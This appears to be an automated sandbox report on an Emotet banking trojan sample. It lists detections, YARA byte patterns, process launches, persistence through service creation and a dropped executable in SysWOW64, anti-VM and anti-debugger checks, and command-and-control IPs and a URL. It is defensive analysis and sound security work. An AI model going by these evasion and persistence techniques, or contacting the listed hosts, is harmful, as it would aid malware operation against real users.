Analysis Report YF4dF4w2Cr

Overview

General Information

Sample Name: YF4dF4w2Cr (renamed file extension from none to exe)
Analysis ID: 376398
MD5: f4d1470af3a7d82560b38558b132d468
SHA1: 0c45cf4e32116eae8d73b52c140f5d91a19ee8ea
SHA256: 6fa0dd6002d4b4e7ebabefc7f4f90f36fc53069e0cf4e845f683fb087d476e90

Detection

Emotet
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Emotet e-Banking trojan
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • YF4dF4w2Cr.exe (PID: 6836 cmdline: 'C:\Users\user\Desktop\YF4dF4w2Cr.exe' MD5: F4D1470AF3A7D82560B38558B132D468)
    • YF4dF4w2Cr.exe (PID: 6856 cmdline: --5c8d8ab7 MD5: F4D1470AF3A7D82560B38558B132D468)
  • fwdrrebrand.exe (PID: 6912 cmdline: C:\Windows\SysWOW64\fwdrrebrand.exe MD5: F4D1470AF3A7D82560B38558B132D468)
    • fwdrrebrand.exe (PID: 6928 cmdline: --1cbc15eb MD5: F4D1470AF3A7D82560B38558B132D468)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 48 07 E8 00 85 C0
  • 0x50d4:$snippet6: 33 C0 21 05 FC 26 E8 00 A3 F8 26 E8 00 39 05 90 F3 E7 00 74 18 40 A3 F8 26 E8 00 83 3C C5 90 F3 ...
00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 48 07 3F 02 85 C0
  • 0x50d4:$snippet6: 33 C0 21 05 FC 26 3F 02 A3 F8 26 3F 02 39 05 90 F3 3E 02 74 18 40 A3 F8 26 3F 02 83 3C C5 90 F3 ...
00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.YF4dF4w2Cr.exe.22f053f.2.unpack | MAL_Emotet_Jan20_1 | Detects Emotet malware | Florian Roth
  • 0x2577:$op1: 03 FE 66 39 07 0F 85 2A FF FF FF 8B 4D F0 6A 20
  • 0x255d:$op2: 8B 7D FC 0F 85 49 FF FF FF 85 DB 0F 84 D1
1.2.YF4dF4w2Cr.exe.22f053f.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
1.2.YF4dF4w2Cr.exe.22f053f.2.unpack | Emotet | Emotet Payload | kevoreilly
  • 0x7ad:$snippet2: 6A 13 68 01 00 01 00 FF 15 48 07 41 00 85 C0
  • 0x48d4:$snippet6: 33 C0 21 05 FC 26 41 00 A3 F8 26 41 00 39 05 90 F3 40 00 74 18 40 A3 F8 26 41 00 83 3C C5 90 F3 ...
2.2.fwdrrebrand.exe.e4053f.2.unpack | MAL_Emotet_Jan20_1 | Detects Emotet malware | Florian Roth
  • 0x2577:$op1: 03 FE 66 39 07 0F 85 2A FF FF FF 8B 4D F0 6A 20
  • 0x255d:$op2: 8B 7D FC 0F 85 49 FF FF FF 85 DB 0F 84 D1
1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack | MAL_Emotet_Jan20_1 | Detects Emotet malware | Florian Roth
  • 0x3177:$op1: 03 FE 66 39 07 0F 85 2A FF FF FF 8B 4D F0 6A 20
  • 0x315d:$op2: 8B 7D FC 0F 85 49 FF FF FF 85 DB 0F 84 D1

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: YF4dF4w2Cr.exe, Avira: detected
Multi AV Scanner detection for submitted file
Source: YF4dF4w2Cr.exe, Metadefender: Detection: 41%
Source: YF4dF4w2Cr.exe, ReversingLabs: Detection: 86%
Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.fwdrrebrand.exe.400000.0.unpack, Avira: Label: TR/AD.Emotet.ddim
Source: 0.0.YF4dF4w2Cr.exe.400000.0.unpack, Avira: Label: TR/AD.Emotet.ddim
Source: 2.2.fwdrrebrand.exe.e4053f.2.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.YF4dF4w2Cr.exe.400000.0.unpack, Avira: Label: TR/AD.Emotet.ddim
Source: 3.2.fwdrrebrand.exe.e4053f.2.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.fwdrrebrand.exe.400000.0.unpack, Avira: Label: TR/AD.Emotet.ddim
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023E207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,1_2_023E207B
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023E215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,1_2_023E215A
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023E1F11 CryptExportKey,1_2_023E1F11
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023E1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,1_2_023E1F75
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023E1F56 CryptGetHashParam,1_2_023E1F56
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023E1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_023E1FFC
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, Code function: 3_2_00E7207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,3_2_00E7207B
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, Code function: 3_2_00E71FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,3_2_00E71FFC
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, Code function: 3_2_00E71F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,3_2_00E71F75
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, Code function: 3_2_00E71F11 CryptExportKey,3_2_00E71F11
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, Code function: 3_2_00E71F56 CryptGetHashParam,3_2_00E71F56
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, Code function: 3_2_00E7215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,3_2_00E7215A
Source: YF4dF4w2Cr.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 0_2_0042E202 lstrlenA,FindFirstFileA,FindClose,0_2_0042E202
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 0_2_00429112 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_00429112
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_0042E202 lstrlenA,FindFirstFileA,FindClose,1_2_0042E202
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_00429112 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_00429112
Source: global traffic, TCP traffic: 192.168.2.4:49739 -> 200.55.168.82:20
Source: global traffic, TCP traffic: 192.168.2.4:49747 -> 70.32.94.58:8080
Source: global traffic, TCP traffic: 192.168.2.4:49748 -> 213.138.100.98:8080
Source: global traffic, TCP traffic: 192.168.2.4:49751 -> 144.76.62.10:8080
Source: global traffic, TCP traffic: 192.168.2.4:49752 -> 203.99.188.203:990
Source: global traffic, TCP traffic: 192.168.2.4:49753 -> 201.196.15.79:990
Source: Joe Sandbox View, IP Address: 190.117.206.153 190.117.206.153
Source: unknown, TCP traffic detected without corresponding DNS query: 190.117.206.153
Source: unknown, TCP traffic detected without corresponding DNS query: 203.99.187.137
Source: unknown, TCP traffic detected without corresponding DNS query: 200.55.168.82
Source: unknown, TCP traffic detected without corresponding DNS query: 70.32.94.58
Source: unknown, TCP traffic detected without corresponding DNS query: 213.138.100.98
Source: unknown, TCP traffic detected without corresponding DNS query: 144.76.62.10
Source: unknown, TCP traffic detected without corresponding DNS query: 203.99.188.203
Source: unknown, TCP traffic detected without corresponding DNS query: 201.196.15.79
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, Code function: 3_2_00E71383 InternetReadFile,3_2_00E71383
Source: fwdrrebrand.exe, 00000003.00000002.911061816.0000000000199000.00000004.00000001.sdmp, String found in binary or memory: http://201.196.15.79/pnp/splash/loadan/merge/
Source: unknown, Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown, Network traffic detected: HTTP traffic on port 49738 -> 443
Source: YF4dF4w2Cr.exe, 00000000.00000002.646439364.00000000007DA000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 0_2_00424B11 GetKeyState,GetKeyState,GetKeyState,0_2_00424B11
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 0_2_0042EEC9 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,0_2_0042EEC9
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 0_2_0040F3F3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_0040F3F3
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 0_2_0040963B SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,0_2_0040963B
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 0_2_00421E22 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_00421E22
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_00424B11 GetKeyState,GetKeyState,GetKeyState,1_2_00424B11
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_0042EEC9 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,1_2_0042EEC9
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_0040F3F3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_0040F3F3
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_0040963B SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,1_2_0040963B
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_00421E22 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,1_2_00421E22

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023ED229 1_2_023ED229
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, Code function: 3_2_00E7D229 3_2_00E7D229
Yara detected Emotet
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023E1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,1_2_023E1F75
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, Code function: 3_2_00E71F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,3_2_00E71F75

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000003.00000002.911351133.0000000000E71000.00000020.00000001.sdmp, type: MEMORY, Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, type: MEMORY, Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000001.00000002.659583488.00000000022F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000003.00000002.911329225.0000000000E40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, type: MEMORY, Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000002.00000002.658516120.0000000000E51000.00000020.00000001.sdmp, type: MEMORY, Matched rule: Emotet Payload, Author: kevoreilly
Source: 00000002.00000002.658502869.0000000000E40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Emotet Payload, Author: kevoreilly
Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPE, Matched rule: Emotet Payload, Author: kevoreilly
Source: 2.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPE, Matched rule: Emotet Payload, Author: kevoreilly
Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE, Matched rule: Emotet Payload, Author: kevoreilly
Source: 1.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Trojan_Emotet, Author: ReversingLabs
Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.unpack, type: UNPACKEDPE, Matched rule: Emotet Payload, Author: kevoreilly
Source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE, Matched rule: Emotet Payload, Author: kevoreilly
Source: 3.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Trojan_Emotet, Author: ReversingLabs
Source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE, Matched rule: Emotet Payload, Author: kevoreilly
Source: 2.2.fwdrrebrand.exe.e4053f.2.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Trojan_Emotet, Author: ReversingLabs
Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE, Matched rule: Emotet Payload, Author: kevoreilly
Source: 0.2.YF4dF4w2Cr.exe.22f053f.2.raw.unpack, type: UNPACKEDPE, Matched rule: Win32_Trojan_Emotet, Author: ReversingLabs
Source: 3.2.fwdrrebrand.exe.e4053f.2.unpack, type: UNPACKEDPE, Matched rule: Emotet Payload, Author: kevoreilly
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023ED3F5 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,1_2_023ED3F5
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: 1_2_023E1D2B CreateProcessAsUserW,CreateProcessW,1_2_023E1D2B
Source: C:\Windows\SysWOW64\fwdrrebrand.exe, File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, File deleted: C:\Windows\SysWOW64\fwdrrebrand.exe:Zone.Identifier
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: String function: 00431A9B appears 430 times
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: String function: 004015A0 appears 56 times
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: String function: 00439FE5 appears 52 times
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: String function: 00431818 appears 142 times
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: String function: 00431ACE appears 50 times
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: String function: 00401170 appears 34 times
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: String function: 0041F363 appears 42 times
Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe, Code function: String function: 00431B04 appears 52 times
Source: YF4dF4w2Cr.exe, 00000000.00000002.646492673.00000000022D0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs YF4dF4w2Cr.exe
Source: YF4dF4w2Cr.exe, 00000001.00000002.659892079.0000000002710000.00000002.00000001.sdmp, Binary or memory string: System.OriginalFileName vs YF4dF4w2Cr.exe
Source: YF4dF4w2Cr.exe, 00000001.00000002.659567664.00000000022D0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs YF4dF4w2Cr.exe
Source: YF4dF4w2Cr.exe, 00000001.00000002.659959901.0000000002770000.00000002.00000001.sdmp, Binary or memory string: originalfilename vs YF4dF4w2Cr.exe
Source: YF4dF4w2Cr.exe, 00000001.00000002.659959901.0000000002770000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs YF4dF4w2Cr.exe
Source: YF4dF4w2Cr.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: classification engine Classification label: mal92.bank.troj.evad.winEXE@6/0@0/8
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0041D7DD __EH_prolog3_GS,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,0_2_0041D7DD
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: OpenSCManagerW,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_023ED4C5
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: OpenSCManagerW,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00E7D4C5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_02311943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_02311943
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0042B11B __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,CoInitializeEx,CoCreateInstance,0_2_0042B11B
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00402500 FindResourceA,WideCharToMultiByte,WideCharToMultiByte,0_2_00402500
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023ED4C5 OpenSCManagerW,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_023ED4C5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\ID1A8F11D
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeMutant created: \BaseNamedObjects\Global\ID1A8F11D
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MD1A8F11D
          Source: YF4dF4w2Cr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: YF4dF4w2Cr.exeMetadefender: Detection: 41%
          Source: YF4dF4w2Cr.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-44293
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
          Source: unknownProcess created: C:\Users\user\Desktop\YF4dF4w2Cr.exe 'C:\Users\user\Desktop\YF4dF4w2Cr.exe'
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeProcess created: C:\Users\user\Desktop\YF4dF4w2Cr.exe --5c8d8ab7
          Source: unknownProcess created: C:\Windows\SysWOW64\fwdrrebrand.exe C:\Windows\SysWOW64\fwdrrebrand.exe
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeProcess created: C:\Windows\SysWOW64\fwdrrebrand.exe --1cbc15eb
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_CURSOR
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_BITMAP
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_ICON
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_MENU
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_DIALOG
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_STRING
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_ACCELERATOR
          Source: YF4dF4w2Cr.exeStatic PE information: section name: RT_GROUP_ICON
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00442426 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00442426
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0043185D push ecx; ret 0_2_00431870
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00431B73 push ecx; ret 0_2_00431B86
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022FE932 pushad ; ret 0_2_022FE933
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_022FE9EA pushad ; iretd 0_2_022FE9ED
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0043185D push ecx; ret 1_2_00431870
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00431B73 push ecx; ret 1_2_00431B86
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022FE932 pushad ; ret 1_2_022FE933
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_022FE9EA pushad ; iretd 1_2_022FE9ED
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E4E9EA pushad ; iretd 2_2_00E4E9ED
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 2_2_00E4E932 pushad ; ret 2_2_00E4E933
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E4E9EA pushad ; iretd 3_2_00E4E9ED
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: 3_2_00E4E932 pushad ; ret 3_2_00E4E933

          Persistence and Installation Behavior:

          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Windows\SysWOW64\fwdrrebrand.exe Executable created and started: C:\Windows\SysWOW64\fwdrrebrand.exe
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe PE file moved: C:\Windows\SysWOW64\fwdrrebrand.exe
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_023ED4C5 OpenSCManagerW,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,1_2_023ED4C5

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe File opened: C:\Windows\SysWOW64\fwdrrebrand.exe:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0040C49C IsIconic,GetWindowPlacement,GetWindowRect,0_2_0040C49C
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00418BD1 GetParent,GetParent,IsIconic,GetParent,0_2_00418BD1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00409E32 IsWindowVisible,IsIconic,0_2_00409E32
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00427FD5 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_00427FD5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_0040C49C IsIconic,GetWindowPlacement,GetWindowRect,1_2_0040C49C
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00418BD1 GetParent,GetParent,IsIconic,GetParent,1_2_00418BD1
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00409E32 IsWindowVisible,IsIconic,1_2_00409E32
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 1_2_00427FD5 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,1_2_00427FD5
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\fwdrrebrand.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Found evasive API chain (may stop execution after checking mutex)
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_1-44324
          Source: C:\Windows\SysWOW64\fwdrrebrand.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,1_2_023ED229
          Source: C:\Windows\SysWOW64\fwdrrebrand.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,3_2_00E7D229
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-43626
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI coverage: 7.8 %
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeAPI coverage: 9.1 %
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exe File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_0042E202 lstrlenA,FindFirstFileA,FindClose,0_2_0042E202
          Source: C:\Users\user\Desktop\YF4dF4w2Cr.exeCode function: 0_2_00429112 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_00429112
